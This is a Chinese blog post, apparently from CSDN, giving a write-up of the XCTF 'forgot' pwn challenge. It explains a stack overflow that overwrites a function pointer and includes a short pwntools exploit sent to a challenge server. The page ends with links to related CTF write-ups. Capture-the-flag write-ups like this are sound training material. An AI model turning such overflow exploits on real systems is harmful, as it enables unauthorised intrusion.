xctf 攻防世界-forgot writeup

最新推荐文章于 2024-06-05 16:45:03 发布
最新推荐文章于 2024-06-05 16:45:03 发布
阅读量1.7k 收藏
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/95042134
版权

在这里插入图片描述
根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点
在这里插入图片描述
可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数
在这里插入图片描述
发现目标函数,接下来我的想法是利用缓冲区溢出把函数指针v12 覆盖为地址0x080486cc,接下来再控制v14的值为10, 那么 &v3+ --v14 便会指向
v12,随后cat flag

exp:

from pwn import *

context.log_level = 'debug'
c = remote("111.198.29.45", 31755)

payload = 'a'*0x44 + p32(0x080486CC) + 'a'*0x20 + p32(0x8)

c.recvuntil(">")
c.sendline("bbb")

c.sendlineafter("> ", payload)

c.interactive()

flag:

在这里插入图片描述

补充:
由于字符0x9 与0xa 是坏字符, 读到这两个字符时会造成截断, v14 的值就无法被覆盖
在这里插入图片描述

苍崎青子
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
xctf攻防世界game writeup
qq_42983283的博客
11-04 301
下载,查看: 载入ida,f5分析,发现sub_457AB4那里很可能是答案: void main_0() { signed int i; // [esp+DCh] [ebp-20h] int v1; // [esp+F4h] [ebp-8h] sub_45A7BE(&unk_50B110); sub_45A7BE(&unk_50B158); sub_45A7BE(&unk_50B1A0); sub_45A7BE(&unk_50B1E8..
xctf攻防世界Shuffle writeup
qq_42983283的博客
11-11 111
下载查看: ida打开分析: int __cdecl main(int argc, const char **argv, const char **envp) { time_t v3; // ebx __pid_t v4; // eax unsigned int v5; // ST18_4 unsigned int v6; // ST1C_4 char v7; // ST20_1 signed int i; // [esp+14h] [ebp-44h] char s; // .
[攻防世界]forgot
逆向萌新的博客
06-21 213
[攻防世界]forgot详解
攻防世界pwn题:forgot
m0_62396648的博客
06-05 492
该文件是32位的,canary和PIE保护机制没开。总览:该函数就是:v5初值为1,对v2输入一串字符。然后执行一个会根据输入的字符串而修改v5的循环语句,最后调用相应的函数。同时,发现文件里面已经含有cat flag的函数: 函数snprintf介绍: printf("cat %s", "./flag")是将cat ./flag输出到屏幕上。 snprintf(s, 0x32, "cat %s", "./flag")是最多将后
攻防世界XCTF-Pwn入门11题解题报告
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-05 650
如果你也想学习:黑客&网络安全的零基础攻防教程Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
攻防世界(PWN)forgot
苗_的博客
10-12 252
感觉有些wp写的不是特别详细,当时我看的时候有的地方也是看不太懂... 先拖进ida中看一下: 找到溢出点,因为我们分配给了v2 32byte的内存,但是scanf不限制长度,所以这里可以溢出。 第88行就是决定程序走向的语句了。 初步思路就是栈上的变量覆盖,在v2这里溢出,覆盖掉v3,然后让程序走到sub_80486CC: 既然我们要覆盖v3,那么根据(&v3+ --v14)我们需要让v14的值不变,因为v14 = 1则--v14 = 0,这样程序就会顺利的走到v3. 观察
C表达式((void (*)(void))0();
雾里看花
11-17 1707
C表达式((void (*)(void))0();通过一步步来讲解: 没有参数和不返回值void f(void)定义一个指针没有参数和返回值void (*p)(void)定义一个仅有类型的指针(void(*))(void)定义一个强转类型(类型定义在括号内,跟着一个值)(void (*)(void))0到目前为止我们定义了一个由0强转成一个指向函数且返回值。这个转换时一个指针到函数的类型。(yo
攻防世界MISC:ext3
juicy_peach_的博客
11-30 560
攻防世界MISC:ext3,难度5
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-HW-pipeline附件
11-09
附件
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
forgot XCTF(你的疑问都可以在这里找到答案)
qq_62539372的博客
07-01 705
基本操作这里就不多说啦 直接进入正题执行文件呢 会看到是关于有限状态自动机会不会被吓到呢(纳尼!?)哈哈 其实是吓唬我们的 下面是主程序的关键部分 已知 char v2[32] 那strlen(v2)=32 for 循环可以改写为 for(i=0;i>=32;++i)注意注意 下面的switch语句 default:continue不同于default:默认为break但是如果是default:continue 就会执行continue语句 跳出此次循环 i++之后继续执行switch语句红框框圈起来的是不
forgot(xctf)
weixin_43868725的博客
05-26 359
0x0 程序保护和流程 保护: 流程: main() int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] int (*v3)(); // [esp+30h] [ebp-54h] int (*v4)(); // [esp+34h] [ebp-50h] int (*v5)(); // [esp+38h] [ebp-4Ch] int (*v6)(); // [esp+3Ch] [ebp-48
攻防世界:PWN刷题-forgot
m0_53932372的博客
12-30 2262
forgot 这题,可有意思了。 大晚上的,有点迷。看了几个wp,一个比一个离谱(太简单了)。 后来自己试了试,还真是······ 思路:本题出现了指针变量并且进行了调用,所以可以利用栈溢出漏洞将该地址覆盖为后门函数的地址,让程序正常执行就可以拿到flag。 坑:一定要注意啊对v5的判定。 v5初值为1,进过下面的判断等操作后,其值被改变,而v5的值决定了程序调用那个指针所指的位置。 exp一定要注意,输入的v2的第一个字符,决定了v5的值。 当输入a的时候,经过判定,v5会变成2,则调用第2-1=1,也
攻防世界--进阶区--forgot
Rt1Text的博客
06-19 277
32位/只有NX保护输入的地方,是溢出点__isoc99_scanf("%s", v2);fgets(s, 32, stdin);fgets函数对输入的数据有限制,所以不会造成溢出 可以拿到flag的函数地址 main函数的内容还挺多的,1张没截完第二张是一个for循环额...........最后一行的代码不是很好看,查了查,可以看看它的汇编应该是调用v3[--v5]的一个函数[esp+78h]就是v5的位置要是可以控制v5也就可以调用函数了在for循环内v5的值一直在发生改变,所以不能让v5进入循环让v
攻防世界之ext3
金 帛的博客
03-22 763
攻防世界WP
攻防世界 ext3
anddddoooo的博客
03-29 96
题目描述给出一个Linux磁盘, 推测出给定一个.iso的光盘映像文件。找到文件O7avZhikgKgbF下的flag.txt。然后将给文件添加扩展名.iso,之后使用压缩软件打开。将文件先用winhex打开,并在文本中寻找flag。打开后发现是一串base64编码加密的字符。得到了flag.txt文件的目录。
攻防世界-MISC:ext3
m0_56161093的博客
11-21 3365
这是攻防世界新手练习区的第九题,题目如下: 点击下载附件1,通过题目描述可知这是一个Linux系统光盘,用010editor打开,搜索flag,发现存在flag.txt文件 将该文件解压,找到flag.txt,打开后得到一串字符串,是被base64加密过的 解密该字符串,得到flag ...
攻防世界upload1
07-28
- *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值